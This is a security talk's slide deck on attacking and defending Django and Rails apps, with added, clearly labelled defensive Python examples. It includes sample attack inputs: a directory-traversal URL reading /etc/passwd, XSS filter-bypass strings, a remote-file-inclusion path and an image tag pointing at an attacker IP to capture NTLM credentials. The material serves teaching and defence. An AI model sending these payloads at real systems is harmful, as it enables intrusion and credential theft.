Pentesting for startups
  • Slide note: All Windows machines have this issue due to NetBIOS \\\\
    1. Pentesting for startups
       • By Levi Gross
    2. Shameless self promotion
       • I work at AxialMarket
       • Researching computer security for 11 years
       • Pentesting for 8 years
       • Python is my language of choice
       • Contact info
         • Blog:
         • @levigross
    3. Disclaimer
       • This talk is strictly for educational purposes. I am not responsible for any outcome of this talk.
       • All images used in the subsequent slides are for informational purposes only and are owned by their respective copyright holders.
    4. The cost of ignorance
       • Dropbox
       • Gawker
       • Sony
    5. Python
       • Dangerous models
         • Pickle
           • Code execution
         • urllib
           • ssl certs
           • file:// is valid
           • Redirects allow any file to be read (this was fixed in 2.7.2)
         • XSS in Basic HTTPServer
       • A wide open playground
         • But syntax is holy
         • Easy to execute code on the host system
           • eval
           • input
         • Unicode issues
         • C extensions
    6. Django
       • Auth framework
       • Session framework
         • Uses unique hashes
         • Uses salted hashes
         • Can use MD5 and crypt but will auto-upgrade
       • Basic global permission structure
       • Cache backend uses pickle
       • Default use of unicode
       • Default URLs
       • Exceptions don't propagate back to the user
       • Automatic variable escaping
       • Built-in CSRF protection
         • Unique hashes
         • In web forms as well as in the cookie
    7. Ruby
       • $SAFE isn't really safe
         • Even layer 4 can be bypassed by exceptions
         • Patched but still insecure
       • SSL verification is disabled by default
       • Global variables
       • Language syntax isn't holy
       • Eval
       • FileUtils
         • remove_entry_secure
       • WEBrick issues
       • Buffer overflow in ARGF.inplace_mode=
       • C extensions
    8. Rails
       • Secure session framework
         • Try not to store data in cookies
         • Remember: base64 is not a method of encryption
         • The database is your friend
         • No information should be put into cookies besides the hash
       • Signed cookies
       • REST
       • Basic permissions
       • Default variable escaping
       • Escaping SQL statements
    9. Information Disclosure
       • Your parts are showing
    10. General Information Disclosure
       • Job sites
         • Internal
         • External
       • Exceptions propagating to the end user
         • Showing everyone what you are running
       • Post mortem blog posts
       • Google
       • Pastebins
       • Complaints
       • Stack Exchange
       • Github
       • Mailing lists
       • Anomalies
         • Forgotten password?
       • Just ask…
    11. And so the fun begins…
       File "/opt/python/domains/", line 60, in wrap
         return f(request, *args, **kwargs)
       File "/opt/python/domains/", line 111, in wrap
         return f(req, *a, **kwa)
       File "/opt/python/domains/", line 211, in frontpage
         newsfeed = load_from_store(request.user)
       File "/opt/python/domains/", line 39, in load_from_store
         if not r.exists(key):
       File "/opt/python/domains/", line 529, in exists
         return self.execute_command('EXISTS', name)
       File "/opt/python/domains/", line 330, in execute_command
         **options
       File "/opt/python/domains/", line 309, in _execute_command
         self.connection.send(command, self)
       File "/opt/python/domains/", line 82, in send
         self.connect(redis_instance)
       File "/opt/python/domains/", line 67, in connect
         redis_instance._setup_connection()
       File "/opt/python/domains/", line 424, in _setup_connection
         self.execute_command('SELECT', self.connection.db)
       File "/opt/python/domains/", line 330, in execute_command
         **options
       File "/opt/python/domains/", line 312, in _execute_command
         return self.parse_response(command_name, **options)
       File "/opt/python/domains/", line 390, in parse_response
         response = self._parse_response(command_name, catch_errors)
       File "/opt/python/domains/", line 335, in _parse_response
         response =[:-2] # strip last two characters (\r\n)
       File "/opt/python/domains/", line 99, in read
         return self._fp.readline()
       File "/opt/python/2.7/lib/python2.7/", line 445, in readline
         data = self._sock.recv(self._rbufsize)
    12. Pasting code into images
    13. But wait, there's more
       remote: Push worked, but post-receive failed: Connection reset by peer
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:234:in `ensure_connected'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:114:in `process'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:183:in `logging'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:113:in `process'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis/client.rb:38:in `call'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis.rb:428:in `sadd'
       remote: /usr/lib/ruby/1.8/monitor.rb:242:in `synchronize'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-2.2.0/lib/redis.rb:427:in `sadd'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-namespace-0.8.0/lib/redis/namespace.rb:188:in `send'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/redis-namespace-0.8.0/lib/redis/namespace.rb:188:in `method_missing'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque.rb:184:in `watch_queue'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque.rb:129:in `push'
       remote: /data/github/current/vendor/gems/ruby/1.8/gems/resque-1.10.0/lib/resque/job.rb:51:in `create'
       remote: /data/github/current/lib/rock_queue.rb:58:in `enqueue'
       remote: /data/github/current/lib/rock_queue.rb:28:in `push'
       remote: hooks/post-receive:37
    14. Not just code hosting sites
    15. Django Information Disclosure
       • Using the default URLs
       • Default paths for media
       • Admin URLs
       • Putting DB fields in URLs
       • URLs == views
       • Switching GET and POST
       • Dajax
       • Celery
       • Piston
       • Template code in the HTML
    16. Rails Information Disclosure
       • Using insecure gems
       • Don't let exceptions propagate to a user
       • Raw template code in the page
       • View logic written in JavaScript
       • Default URLs
       • Object IDs in the URL
    17. Countermeasures
       • Never let exceptions propagate to the end user
       • Don't paste your raw tracebacks directly into any public online location
         • Sanitize them
       • Every bit of information that is released can be used against you
       • Don't rely on anything here for security
    18. Build a profile of your target
       • Blackbox testing
       • Look for patterns
         • Corners cut
         • Style of code (HTML)
       • Learn about the application
       • Learn the problems/issues programmers face when dealing with these systems
       • Gauge difficulty
    19. Time to kick down the door
    20. Session Hijacking
       • TCP sniffing
       • Firesheep
       • ARP poisoning
    21. HTTP Sessions in Django & Rails
       • Django
         • Each session is a unique hash value
         • Cookies can be read via JavaScript
         • Predictable cookie name 'sessionid'
         • Uses the pickle model
         • Defaults to an insecure cookie
         • Values are stored in the session backend
         • No default cookie domain
         • File backend allows for reading in the /tmp folder
         • Immune to classic cookie poisoning
       • Rails
         • Signed cookies
         • Default storage is to the cookie…
    22. Session Hijacking in Django and Rails
       • Once you have the cookie you have the user…
    23. Attack Scenarios
       • TCP sniffing
         • WiFi
         • ARP poisoning
       • Thank you SSL for being useless
       • Stealing cookies via a 3rd party site
       • Who needs passwords when you have sessions…
    24. Countermeasures
       • General
         • Cycle sessions when the user authenticates
         • Use a cryptographic nonce
       • Django
         • Make sure you set the following settings
           • HTTP_ONLY (only in 1.3)
           • SECURE
         • Change the cookie name
         • Serialize using JSON or YAML
       • Rails
         • Sign cookies
         • Make the cookies secure and HTTP only
         • Use the DB to store session data
         • Clear the sessions after login
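The Django session-cookie settings slide 24 lists, as an added example that is not from the talk: the weak values beside the hardened ones, plus a hypothetical `audit_session_settings` helper that flags the weak ones in any settings mapping. The setting names are real Django settings (SESSION_SERIALIZER only exists in releases later than the talk covers; it is included because the slide recommends JSON over pickle); the cookie name "acme_sid" is a constructed value.

```python
# Added example, not from the talk. Django setting names are real; the
# audit helper and the values in the two mappings are constructed for the demo.
WEAK = {
    "SESSION_COOKIE_NAME": "sessionid",   # the predictable default name (slide 21)
    "SESSION_COOKIE_HTTPONLY": False,     # cookie readable via document.cookie
    "SESSION_COOKIE_SECURE": False,       # cookie also sent over plain HTTP
    "SESSION_SERIALIZER": "django.contrib.sessions.serializers.PickleSerializer",
}

HARDENED = {
    "SESSION_COOKIE_NAME": "acme_sid",    # constructed app-specific name
    "SESSION_COOKIE_HTTPONLY": True,      # HttpOnly flag (Django 1.3+, per the slide)
    "SESSION_COOKIE_SECURE": True,        # only sent over HTTPS
    "SESSION_SERIALIZER": "django.contrib.sessions.serializers.JSONSerializer",
}


def audit_session_settings(settings: dict) -> list:
    """Return one finding per weak session-cookie setting.

    A missing key is treated as weak, matching the defaults the talk
    describes for the Django version it covers.
    """
    findings = []
    if settings.get("SESSION_COOKIE_NAME", "sessionid") == "sessionid":
        findings.append("SESSION_COOKIE_NAME is the predictable default 'sessionid'")
    if not settings.get("SESSION_COOKIE_HTTPONLY", False):
        findings.append("SESSION_COOKIE_HTTPONLY is off: JavaScript can read the session cookie")
    if not settings.get("SESSION_COOKIE_SECURE", False):
        findings.append("SESSION_COOKIE_SECURE is off: the session cookie travels over plain HTTP")
    if "Pickle" in settings.get("SESSION_SERIALIZER", "PickleSerializer"):
        findings.append("SESSION_SERIALIZER uses pickle: session data is unpickled on load (slide 45)")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        found = audit_session_settings(cfg)
        print(f"{name}: {len(found)} finding(s)")
        for line in found:
            print("  -", line)
```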
    25. XSS (Cross site scripting)
       • Enables attackers to inject client-side script (HTML/JS) into web pages viewed by other users.
    26. XSS in Django
       • Auto-escapes ' < > & " with their "safe alternatives"
       • Problems
         • Any other unicode will bypass this check
         • If items are not properly quoted you can still inject attributes into tags
         • Other special characters aren't escaped ( )
       • Designers
         • Hate |safe and just use {% autoescape off %}
    27. XSS in Rails
       • 2.x
         • Variables aren't automatically escaped
         • Tags are stripped using the strip_tags method
       • 3.x
         • Automatic variable escaping
         • Unless you use raw
         • or some other function that doesn't return safe output
       • Attack
         • White lists are useless
           • selselectect <scri<script>pt>
         • Sanitizing the HTML special characters has the same issue Django has
         • Tags that don't sanitize
         • Concatenation will remove any escaping
         • Sanitizing doesn't always work
         • AJAX still isn't escaped
    28. Attack Scenarios
       • Steal user info
       • Change user settings
       • Steal an admin cookie and add yourself as an admin user
       • Execute code as an admin to add yourself as an admin user
    29. Countermeasures
       • General
         • Force the browser to use UTF-8
         • Never trust user input
         • Don't use user input for HTML tag attributes
         • Take a page out of the Python zen: in the face of ambiguity, refuse the temptation to guess.
       • Django
         • Use the OWASP ESAPI
         • If you need styling
           • Use sanitizers
             • lxml
             • bleach
           • Use markdown
         • Use whitelists not blacklists
       • Rails
         • Escape all user input
         • before_filter :only => […] instead of :except => […]
         • Use sanitizers
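The two bypass strings on slide 27 (selselectect and <scri<script>pt>), worked through as an added example that is not from the talk: a single-pass blacklist reassembles the forbidden token, re-running it to a fixed point only closes that one trick, and output encoding (slide 29) is what actually removes the problem. The attribute case from slide 26 is covered by `render_attr`. BLACKLIST and all function names are constructed for this demo.

```python
import html

# Added example, not from the talk. BLACKLIST is constructed to mirror the two
# tokens slide 27 uses; the functions are hypothetical.
BLACKLIST = ("<script>", "select")


def blacklist_strip(value: str) -> str:
    """Single-pass blacklist: each bad token is deleted once, left to right.
    Deleting the inner token can glue the surrounding text into a new one."""
    for bad in BLACKLIST:
        value = value.replace(bad, "")
    return value


def strip_until_stable(value: str) -> str:
    """Re-run the blacklist until nothing changes. Closes the nesting trick,
    but it is still a blacklist: anything not on the list goes straight through."""
    while True:
        stripped = blacklist_strip(value)
        if stripped == value:
            return value
        value = stripped


def escape_text(value: str) -> str:
    """Output encoding: the browser displays the text and never parses it as markup."""
    return html.escape(value, quote=True)


def render_attr(name: str, value: str) -> str:
    """Always quote an attribute AND escape its value, so a quote in the input
    cannot close the attribute and start another one (slide 26's second problem)."""
    return f'{name}="{html.escape(value, quote=True)}"'
```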
    30. Clickjacking
       • Overlaying the current website with an IFRAME
       • Tricking the user into clicking on certain elements
       • The user unknowingly performs an action on the website he is logged into
    31. Attack Scenario
       • Lure the user to your site
       • Add yourself as an admin user
       • The sky's the limit
    32. Frame busting
       • X-FRAME-OPTIONS DENY
       • Disable IFRAME JavaScript
         • Restricted => IE
         • Sandbox => Chrome
         • designMode in Firefox and Safari
       • Use JavaScript to navigate back to prevent IFRAMEs from opening your site
       • This is always being exploited, so keep up with the latest exploits
       • Read more:
    33. CSRF
       • Cross site request forgery
    34. CSRF in Django
       • Built-in CSRF protection
         • Keep up to date
         • In the form and the HTTP headers/cookie
       • Attacks
         • It's annoying, so people turn it off
         • Only recently do they check AJAX requests
         • Use subdomains
    35. CSRF in Rails
       • Like Django, recently changed
       • REST makes things harder…
       • Stored in the cookie
       • Attacks
         • An XSS exploit renders this protection useless
         • Subdomains
    36. Attack Scenario
       • Attacker uses XSS to inject code within the admin site to exploit an internal-site CSRF issue
       • <img src=<evil IP>> gives me your NTLM
    37. Cookie Poisoning
       • Cookies are encoded
         • Base64
       • People never see them…
       • Let's store important information
       • Attacker can
         • Submit a malformed cookie
         • Steal another user's cookie
    38. Cookie Poisoning in Django
       • Django defaults to its session backend, which doesn't do this
       • Attack
         • People will still use request.COOKIES
         • Issues with the session backend
    39. Cookie Poisoning in Rails
       • Rails allows you to shoot yourself in the foot
       • Attack
         • Storing info in cookies
         • Not signing cookies
         • Using cookies to manipulate view logic
    40. Attack Scenario
       • Pass a malformed cookie back to the server
         • DDOS
         • Remote code execution
         • Impersonation
    41. Countermeasures
       • Use sticky sessions
       • Django
         • Use the session app
         • Use a consistent session backend
         • Escape and validate data
       • Rails
         • Sign your cookies
         • Only use hashes
         • Never trust the user
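Slides 37 to 41 in working code, as an added example that is neither from the talk nor from Rails itself: a plain base64 cookie that any user can decode, edit and re-encode, next to a minimal signed cookie in the Rails style (base64 payload, "--", HMAC) whose signature check rejects the edited copy. SECRET_KEY and the cookie contents are constructed values; the function names are hypothetical.

```python
import base64
import hashlib
import hmac

# Added example, not from the talk. SECRET_KEY is a constructed value; a real
# application loads it from configuration and never ships it in a repository.
SECRET_KEY = b"constructed-secret-for-the-example-only"


def encode_cookie(data: str) -> str:
    """Base64 only (slide 37): anyone holding the cookie can read and rewrite it."""
    return base64.b64encode(data.encode()).decode()


def decode_cookie(cookie: str) -> str:
    return base64.b64decode(cookie.encode()).decode()


def sign_cookie(data: str, key: bytes = SECRET_KEY) -> str:
    """Payload plus an HMAC-SHA256 over it. Standard base64 never contains '-',
    so '--' is an unambiguous separator between payload and signature."""
    payload = encode_cookie(data)
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}--{mac}"


def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the payload when the signature checks out, otherwise None."""
    payload, sep, mac = cookie.rpartition("--")
    if not sep:
        return None                      # unsigned cookie: never trusted
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):   # constant-time, see slide 55
        return None
    return decode_cookie(payload)


def tamper(cookie: str, old: str, new: str) -> str:
    """What any user can do to their own cookie: change a field and keep
    whatever signature was attached."""
    payload, sep, mac = cookie.rpartition("--")
    if not sep:
        return encode_cookie(decode_cookie(cookie).replace(old, new))
    forged = encode_cookie(decode_cookie(payload).replace(old, new))
    return f"{forged}--{mac}"
```

The signed payload is still readable by the user, which is why slide 28 says to keep nothing in the cookie but the session hash.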
    42. HTTP Parameter Poisoning
       • Injecting invalid values into HTTP params
       • Directory traversal
         • http://someserver/somepage/?val=g&file=../../../../../../etc/passwd
       • HTTP response splitting
         • Injecting \r\n into fields, splitting the response headers
       • Remote file inclusion
         • /myview?someparam=C:\ftp\upload\exploit
       • Invalid method
         • Using a POST in place of a GET and vice versa
       • Referrer poisoning
         • http://someserver/somepage/?val=g&referrer=<myurl>
    43. HTTP Parameter Poisoning in Django
       • Django is immune to
         • Directory traversal
         • HTTP response splitting
         • Remote file inclusion
       • Forms' cleaned_data allows for value escaping
       • Attacks
         • Switching GET and POST is not enforced
         • Not all HTTP params are auto-escaped by default
         • Cache and sessions use pickle
    44. HTTP Parameter Poisoning in Rails
       • Blind use of HTTP parameters
       • Invalid file name checking
         • Arbitrary file upload and execution
       • XSS
         • Remember: use AJAX
       • Privilege escalation
       • SQL injection
    45. Attack Scenarios
       • Remote code execution via the cache/session layer
       • Authentication bypass by GET/POST switch
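Server-side checks for three of the parameter classes on slide 42 (directory traversal, CR/LF response splitting, referrer/redirect poisoning), as an added example that is not from the talk or from either framework. UPLOAD_ROOT and ALLOWED_HOSTS are constructed values and every function is hypothetical; the path check works at string level with posixpath, so on a live filesystem you would also resolve symlinks with os.path.realpath.

```python
import posixpath
from urllib.parse import urlparse

# Added example, not from the talk. Constructed values for the demo:
UPLOAD_ROOT = "/srv/app/uploads"
ALLOWED_HOSTS = {"app.example.com"}


def resolve_upload_path(user_supplied: str, root: str = UPLOAD_ROOT) -> str:
    """Map a 'file' parameter onto a path under root, or raise ValueError."""
    # join() throws root away for an absolute input; normpath() collapses '..'
    # segments, so the escape shows up as a path outside root afterwards.
    candidate = posixpath.normpath(posixpath.join(root, user_supplied))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"path escapes {root}: {user_supplied!r}")
    return candidate


def safe_header_value(value: str) -> str:
    """Reject CR/LF so a parameter echoed into a header cannot end the header
    and start a new one (response splitting)."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in a header value")
    return value


def safe_redirect_target(url: str) -> str:
    """Allow only local paths or absolute http(s) URLs on our own hosts."""
    if "\\" in url:                       # browsers read '\' as '/', parsers do not
        raise ValueError("backslash not allowed in redirect target")
    parts = urlparse(url)
    if parts.scheme not in ("", "http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.netloc:                      # absolute URL or scheme-relative //host
        if parts.scheme == "" or parts.netloc not in ALLOWED_HOSTS:
            raise ValueError(f"host not allowed: {parts.netloc!r}")
    elif not url.startswith("/"):
        raise ValueError("relative redirect must start with '/'")
    return url


def is_rejected(check, value) -> bool:
    """Demo/test helper: True when the check raises ValueError for value."""
    try:
        check(value)
    except ValueError:
        return True
    return False
```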
    46. Logic Flaws
       • Unauthenticated views
       • Information leaks
       • Weak or invalid permissions
       • eval
       • Passing unsanitized input around
    47. Exploiting Logic Flaws in Django & Rails
       • Django
         • @login_required
         • Permissions are global
         • Objects are serialized
         • Arbitrary input may have some exciting outcomes
         • Logic manipulation
         • debug=True
         • Remember: in Python nothing is sacred
       • Rails
         • Explicit authentication
         • Explicit permission checking
         • Ruby syntax is extendable
    48. SQL Injection
       • Cookies
       • HTTP parameters
       • Logic flaws
       • XSS
    49. SQL Injection in Django
       • Parameterized queries
       • LIKE queries are escaped
       • Attacks
         • WHERE is still injectable
         • People use cursor.raw() all the time
         • Character escaping is always being broken
         • More Python unicode fun…
    50. SQL Injection in Rails
       • Uses regular expressions to "escape" values
         • Even with parameterized queries
         • *.connection.quote
       • Very easy to execute raw SQL
         • where
         • order
    51. Attack Scenarios
       • Information theft
       • Hosting malware or exploits
       • Full site exploitation
    52. Countermeasures
       • Only use the permissions that you need
       • Validate and sanitize all input (twice cannot hurt)
       • Encrypt sensitive data
    53. Passwords in Django
       • Brute force friendly
       • Salted hashes
         • Good but not perfect
       • Timing attacks
         • Mitigation added in 1.3 but flawed due to Python's string interning
       • Compatible with older insecure hashes
       • The Achilles heel of any system
    54. Passwords in Rails
       • No authentication
       • Very popular
         • REST authentication
         • Blind use of params[:]
         • Clear text passwords in the logs
       • Brute force friendly
       • Salted hashes
         • Good but not perfect
       • Timing attacks
    55. What are timing attacks
       • Side channel attacks
       • Linear operations
       • The dangerous binary comparison…
    56. Countermeasures
    57. Authentication
       • OAuth
         • Everyone forgets to use SSL
         • Even if you do, you're still opening yourself up to a Man In The Middle attack
       • Best
       • Worst
    58. Attack Scenarios
       • Crack password
         • SQL injection
         • Brute force
         • Phishing
       • DDOS
       • No SSL on OAuth
         • Even with SSL still vulnerable to a Man In The Middle attack
       • Have fun
    59. Countermeasures
       • Dual factor authentication
       • Rate limit authentication logic
       • Monitoring
       • Tough permission checks
       • Whitelists/blacklists
       • Certificate authentication to verify the provider
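The "dangerous binary comparison" of slide 55 made visible, as an added example that is not from the talk: rather than measuring wall-clock time (noisy on a laptop), each compare returns how many bytes it examined before deciding, which for the early-exit version is exactly the side channel. SECRET is a constructed value and the function names are hypothetical; `hmac.compare_digest` is the real stdlib primitive (Python 2.7.7+/3.3+).

```python
import hmac

# Added example, not from the talk. SECRET is constructed for the demo (28 bytes).
SECRET = b"correct horse battery staple"


def naive_compare(presented: bytes, secret: bytes):
    """Stops at the first mismatch. Returns (equal, bytes_examined): the count
    grows with the length of the correct prefix, so an attacker who can observe
    it learns which guess is getting 'warmer', one byte at a time."""
    if len(presented) != len(secret):
        return False, 0
    examined = 0
    for x, y in zip(presented, secret):
        examined += 1
        if x != y:
            return False, examined
    return True, examined


def constant_time_compare(presented: bytes, secret: bytes):
    """Walks every byte and accumulates the differences with OR, so the work
    done no longer depends on where the first mismatch is. The length check
    still leaks length, which is why real code compares fixed-length digests
    rather than the raw secrets."""
    if len(presented) != len(secret):
        return False, 0
    diff = 0
    examined = 0
    for x, y in zip(presented, secret):
        examined += 1
        diff |= x ^ y
    return diff == 0, examined


def verify_token(presented: str, expected: str) -> bool:
    """What production code should call: the stdlib primitive, implemented in C
    in CPython, so interpreter-level quirks like the one slide 53 mentions
    do not apply to it."""
    return hmac.compare_digest(presented.encode(), expected.encode())


if __name__ == "__main__":
    for guess in (b"x" * 28, b"correct" + b"x" * 21, SECRET):
        print(guess, naive_compare(guess, SECRET), constant_time_compare(guess, SECRET))
```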
    60. Denial of Service in Django & Rails
       • Remember the GIL
       • No rate limiting
       • Switching HTTP methods
       • Python
         • Virtual method calls
       • Ruby
         • Slow method dispatch
    61. Great, another crazy guy screaming about the end of the world.
       • Never rely on one thing alone
       • Ask yourself at every point of your application: "If someone has penetrated this far, what is stopping him?"
         • Onion?
       • Code defensively
         • Remember that unknown variables will enter the equation and you have to account for them
       • Monitor everything
       • Show you care
         • Create a security page
         • Make sure to include a PGP key
         • Create an incident response document
           • Give it a trial run
       • Remember: a good programmer looks both ways before crossing a one-way street.
    62. Recommended Reading
       • General
         • Writing Secure Code (Microsoft Press)
         • Hacking Exposed: Web Applications
         • The Web Application Hacker's Handbook
       • Django
       • Rails
       • Tools
    63. Questions